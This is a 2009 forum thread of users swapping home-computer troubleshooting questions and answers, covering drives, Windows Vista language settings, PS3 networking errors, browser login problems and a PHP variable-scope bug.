I don't know much about connectors. Is it possible for this (http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=170312824470&ih=007&category=163769&_trksid=p4340.m185&_trkparms=algo%3DSI%26its%3DI%252BC%252BS%252BIA%2 6itu%3DUCC%252BCSP%252BUCI%252BSI%26otn%3D8%26ps%3 D35) to take the place of a ZIF ATA-100 hard drive? If not normally, is there an adapter or something that will let you connect it?

nieh
03-31-2009, 08:29 AM
Bump, because someone felt the need to knock this to the second page by bumping a lot of uninteresting threads.

Lizardus
03-31-2009, 08:47 PM
I've read about a virus called conficker who's going to infect more than ten million pcs around the world in April the first. AFAIK that's no joke. Just a simple warning to you all.

I find this thread to have decent enough info:
klic hear (http://forums.megatokyo.com/index.php?showtopic=1733211)

Tijs
04-01-2009, 08:39 AM
I bought a new harddrive today (SAMSUNG HD103UJ) and connected it in my computer. It is being recognized, but I can't access it under My Computer.
My computer booted normally and after it did some thinking I got the message that new hardware was found, but I had to reboot to use it. Now, I guess I can't see it because it isn't partitioned.. how do I do that?

This is what it shows under Device Manager:

http://i39.tinypic.com/255v2xk.gif

This is what is shows under My Computer:

http://i40.tinypic.com/6og3fq.gif

And this is using Everest software, a program to check hardware:

http://i44.tinypic.com/20h3jgp.gif

edit: st00pid. I forgot about compmgmt.msc, it's formatting now so I'll be likely to access and use it after it's finished with that.

Jebus
04-04-2009, 08:00 PM
So my mom bought a computer for my younger cousins in El Salvador. I have to configure everything in working order including the language. Turns out simply changing the language settings to Spanish doesn't change the interface, only texts on wizards and a few other things. After some research, I find out Multilingual User Interface is only available to Ultimate users and the computer came with home premium. My only options are to pirate Ultimate or buy the upgrade. Anyone know if pirated Ultimate copies are an in danger of getting fucked over by WGA with automatic updates on? Or are the cracks safe enough that you don't have to worry about it? If anything goes wrong, I won't really be in a position to help over the phone. Oh, if you have any alternative solutions to my problem, do tell.

Also, need help making a list of software goodies to install before sending it out.

Jebus
04-04-2009, 11:43 PM
Turns out college/university students only have to pay $64 for the ultimate upgrade. As dirty as I feel for buying a microsoft product, $64 isn't that bad and $10 goes to an African AIDs charity. Thirty minutes after the purchase, I find out a program called Vistalizator does what I need. I check the return policy for Vista. No refunds. FFFFFFFFFFFFFFFF
oh well. At least I get the peace of mind of nothing piracy related going horribly wrong when they get the computer.

My list so far.
-openoffice
-firefox
-vlc
-winamp
-avg
-foxit
What else should I include?

Lizardus
04-05-2009, 12:18 AM
Avira seems to go well with AVG, so i would suggest that one and winrar (you can't spell winrar without win).
Also include a firewall or something that's just as good to be on the safe side.

Jebus
04-08-2009, 01:47 AM
YESSSSS! I won a laptop (http://www.newegg.com/Product/Product.aspx?Item=N82E16834152073&Tpk=GX630)from ebay for $630 just now. The cpu is kind of meh, but the graphics card is decent enough. Been living with a shitty Dell desktop with a P4 for far too long.

Don't really have a problem, but I felt like mentioning it.

Andy
04-22-2009, 05:36 PM
Umf. Umf. UMGHGFFFFFFFF. Bloody technology.

Right, I've got a PS3. I also have a PC. Both of these contraptions used to be connected to the internet via a wireless router. All was well.

Today my flatmate (quite rightly) decided we should go for wired broadband, to get a faster service. This is done, and to be fair it is faster than the wireless. There is, however, a problem. I don't know whether this is just coincidence or what, but since the PC has been changed to wired connection I'm having real trouble with my PS3. For one, it can't seem to connect to the PlayStation Network.

There haven't been any changes to the router, to the IP or to the WEP, and when I run a connection test it says (90% of the time) that the IP is fine and it can connect to the internet, but it always times out of connecting to the PSN. Now, I did have a little mess around and tried a wired connection to the PS3 and it worked fine - connected to everything no problem. Anyone got any theories as to why this is? I mean, if it still doesn't work tomorrow I think I'll just get another ethernet cable and have it wired anyway.

The second point is one that can't be rectified by a wired connection: it's down to bloody media servers. For some reason, at exactly the same time that the PS3 started to refuse to wirelessly connect to the PSN, it's also decided to stop showing streamed media from the PC. For the last week or so I've been able to watch movies, TV shows etc streamed directly from my PC to the PS3 but now I'm just getting an error message, "A DLNA protocol error (7531) has occurred". That's been happening continuously tonight, with maybe the error code changing from 7531 to 2063 or something similar.

The PS3 is on the allowed devices list in WMP 11 and I've got all sharing options green-lighted in the Network & Sharing window so it's not something as simple as that.

Obviously, this is Big Heap Annoying as it was working perfectly up until 4 hours ago. Any of you computery people have any idea what could be causing it? Surely it can't be sulking because I chose wired over wireless?

Oh and before you ask, I did try it by reverting the PC back to wireless as well but had the same problem.

I've done a Google search about this and despite a number of other people having the same error message, none of the advice is particularly helpful for me.

I could just buy a good external hard drive, move all my audio/visual stuff onto there and plug it into the PS3, but obviously it would be preferable if I knew how to rectify this problem.

The Talking Pie
04-22-2009, 06:02 PM
I have a couple of ideas, but I need more information. First off, I'm confused; you switched from wireless to wired broadband, but your router hasn't changed? Have you upgraded to a new service, or do you just mean ditching wifi on the router and plugging ethernet cables in instead?

If you have a new modem, check the DNS settings. If you've just plugged a cable in, it sounds like a coincidence. Or a broken cable, maybe?

I dunno; give me more information about exactly what has changed in your set-up.

Andy
04-22-2009, 06:14 PM
Nope, nothing changed at all. I disabled wireless on the computer and am now running through a ethernet cable running directly from the router into the PC. As I've said, internet connectivity to the PC works fine; it's the wireless (and media server) connection to the PS3 which is causing the trouble.

Bipolar Bear
04-22-2009, 06:23 PM
OH MY $!%!?"! GOD, NOW I SEE WHY THIS OPERATING SYSTEM IS CALLED WiNDOWS, I JUST WANT TO THROW MY %*!()%! COMPUTER OUT OF THE WINDOW!

The Talking Pie
04-23-2009, 11:20 AM
Andy: that shouldn't really make any difference at all. Does the problem persist when you turn off/unplug the PC? To be honest, it just sounds like a strange coincidence.

the_offsprings_monkey
04-25-2009, 10:28 PM
Ok, so my laptops is being annoying and taking ages to start from hibernation mode, it does however seem to start up faster from just turning it on after it has been shut down, what could be the explanation for this? Also I don't know what it is, but it seems to not be able to handle certain games like it used to, it used to run Warrock Online and games such as Mafia and GTA:Vice City, perfectly fine, but now I sometimes get lag etc. I've tried running programs such as Tune Up Utilities for the registry and computer errors scan etc and cleaner my Internet history using Ccleaner, but to no avail.

RageAndLov
04-26-2009, 05:21 AM
^If your computer is old, it is normal that it gets slower and slower. If you've tried everything, maybe the only thing left to do is to reboot your computer.

Alison
05-01-2009, 02:20 PM
since the other day, when i had to switch off my laptop manually because of a load of popups, everytime i go into my email now, i have to type in my email and password, where itd usually remember and sign me in automotically. Now even when i select remember my email and passwird, it still does it. ive set my internet to remember what i've typed in, but still, nothing :mad: its really frustrarting signing in everytime. this is also the case with my flickr account too.

m.offspring.r
05-01-2009, 02:24 PM
since the other day, when i had to switch off my laptop manually because of a load of popups, everytime i go into my email now, i have to type in my email and password, where itd usually remember and sign me in automotically. Now even when i select remember my email and passwird, it still does it. ive set my internet to remember what i've typed in, but still, nothing :mad: its really frustrarting signing in everytime. this is also the case with my flickr account too.

try with another browser... Opera, Firefox....

mynamewastaken
05-02-2009, 03:25 PM
i dont have any computer problems (at the moment, knock on wood) but my mp3 player wont download or play music. it turns on but won't do anything.

The Talking Pie
05-02-2009, 03:51 PM
What make/model is it? A lot of MP3 players nowadays just hibernate instead of shutting down. Do a Google search on how to soft reset your player; that may help.

Tijs
05-05-2009, 02:16 PM
Can someone explain to me why this isn't working, or how I get it to work. I think it has something to do with the array not being global.

/********************************** LANG.PHP **********************************/

<?php
$lang = array();
$lang['word'] = "I hear ya.";
$lang['okay'] = "Whatever you want.";
$lang['what'] = "Gimme a holler.";
?>

/******************************** FUNCTION.PHP ********************************/

<?php
function myfunction($var) {
if ($var == 1) { $test = $lang['word']; }
elseif ($var == 2) { $test = $lang['okay']; }
else { $test = $lang['what']; }
echo $test;
}
?>

/********************************* INDEX.PHP **********************************/

<?php
// error_reporting(E_ALL & ~E_NOTICE);
include ('lang.php');
include ('function.php');

$int = 1;
myfunction($int);
?>

m.offspring.r
05-05-2009, 02:43 PM
PHP is case sensitive?

Tijs
05-05-2009, 02:46 PM
The filenames are actually in lowercase, so that's not it.

m.offspring.r
05-05-2009, 03:02 PM
ahhh ok ok...